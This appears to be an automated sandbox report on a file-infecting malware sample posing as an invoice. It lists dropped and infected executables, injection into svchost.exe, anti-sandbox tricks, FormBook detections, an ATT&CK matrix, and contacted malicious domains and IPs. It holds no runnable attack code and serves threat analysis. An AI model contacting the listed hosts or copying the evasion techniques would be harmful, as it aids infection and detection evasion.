      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exeJump to dropped file
      Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.logJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Creates files inside the volume driver (system volume information)
      Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\invoice_96.73.exeAPI/Special instruction interceptor: Address: D4110C
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: armsvc.exe, 00000002.00000003.420558852.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FHTTPHTTPSFILEUNKNOWN%LS\%LSSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACING\EVENTTHROTTLELASTREPORTEDSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACINGEVENTTHROTTLEMAXEVENTSEVENTTHROTTLEMAXCONTROLPERIODMSEVENTTHROTTLEBLOCKPERIODMSEVENTTHROTTLEFLUSHPERIODMSMSFTE.DLLMSTRACER.DLL
      Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 401Jump to behavior
      Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 3816
      Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 6182
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\CCleaner\CCleaner64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\java.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\dllhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\CCleaner\CCleaner.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exe TID: 3384Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\alg.exe TID: 3488Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exe TID: 3828Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\ehome\ehsched.exe TID: 3904Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\ieetwcollector.exe TID: 4052Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\msdtc.exe TID: 3056Thread sleep count: 401 > 30Jump to behavior
      Source: C:\Windows\System32\msdtc.exe TID: 3056Thread sleep time: -40100s >= -30000sJump to behavior
      Source: C:\Windows\System32\msiexec.exe TID: 2028Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep count: 3816 > 30
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep time: -38160000s >= -30000s
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep count: 6182 > 30
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep time: -61820000s >= -30000s
      Source: C:\Windows\System32\vds.exe TID: 2632Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\wbengine.exe TID: 2216Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\invoice_96.73.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice_96.73.exe"Jump to behavior
      Source: invoice_96.73.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
      Source: C:\Users\user\Desktop\invoice_96.73.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\ehome\ehsched.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\alg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: invoice_96.73.exe, 00000000.00000002.356954240.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.347417971.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.348829898.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.346600617.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.346132197.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.346170507.0000000000C4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Scheduled Task/Job      		1
      Windows Service      		1
      Windows Service      		222
      Masquerading      		OS Credential Dumping22
      Security Software Discovery      		1
      Taint Shared Content      		Data from Local System2
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Scheduled Task/Job      		212
      Process Injection      		2
      Virtualization/Sandbox Evasion      		LSASS Memory2
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      LSASS Driver      		1
      Scheduled Task/Job      		212
      Process Injection      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive13
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron1
      DLL Side-Loading      		1
      LSASS Driver      		1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
      DLL Side-Loading      		1
      Software Packing      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials112
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564502 Sample: invoice_96.73.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 36 yunalwv.biz 2->36 38 ytctnunms.biz 2->38 40 15 other IPs or domains 2->40 54 Suricata IDS alerts for network traffic 2->54 56 Antivirus detection for dropped file 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 8 other signatures 2->60 7 armsvc.exe 1 2->7         started        12 invoice_96.73.exe 3 2->12         started        14 wbengine.exe 2->14         started        16 13 other processes 2->16 signatures3 process4 dnsIp5 42 yunalwv.biz 208.100.26.245, 49184, 80 STEADFASTUS United States 7->42 44 lpuegx.biz 82.112.184.197, 49172, 49173, 49174 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 7->44 52 20 other IPs or domains 7->52 20 C:\Windows\ehome\ehsched.exe, PE32+ 7->20 dropped 22 C:\Windows\ehome\ehrecvr.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\wbengine.exe, PE32+ 7->24 dropped 34 73 other malicious files 7->34 dropped 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->62 64 Drops executable to a common third party application directory 7->64 66 Infects executable files (exe, dll, sys, html) 7->66 46 acwjcqqv.biz 18.141.10.107, 49165, 49166, 49171 AMAZON-02US United States 12->46 48 ssbzmoy.biz 12->48 50 pywolwnvd.biz 12->50 26 C:\Windows\System32\alg.exe, PE32+ 12->26 dropped 28 C:\Windows\...\FlashPlayerUpdateService.exe, PE32 12->28 dropped 30 C:\Windows\Microsoft.NET\...\aspnet_state.exe, PE32+ 12->30 dropped 32 C:\Program Files (x86)\...\armsvc.exe, PE32 12->32 dropped 68 Binary is likely a compiled AutoIt script file 12->68 70 Writes to foreign memory regions 12->70 72 Maps a DLL or memory area into another process 12->72 74 Switches to a custom stack to bypass stack traces 12->74 18 svchost.exe 12->18         started        76 Creates files inside the volume driver (system volume information) 14->76 file6 signatures7 process8

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      invoice_96.73.exe96%ReversingLabsWin32.Virus.Expiro
      invoice_96.73.exe100%AviraW32/Infector.Gen
      invoice_96.73.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%AviraW32/Infector.Gen
      C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%AviraW32/Infector.Gen
      C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%AviraW32/Infector.Gen
      C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%AviraW32/Infector.Gen
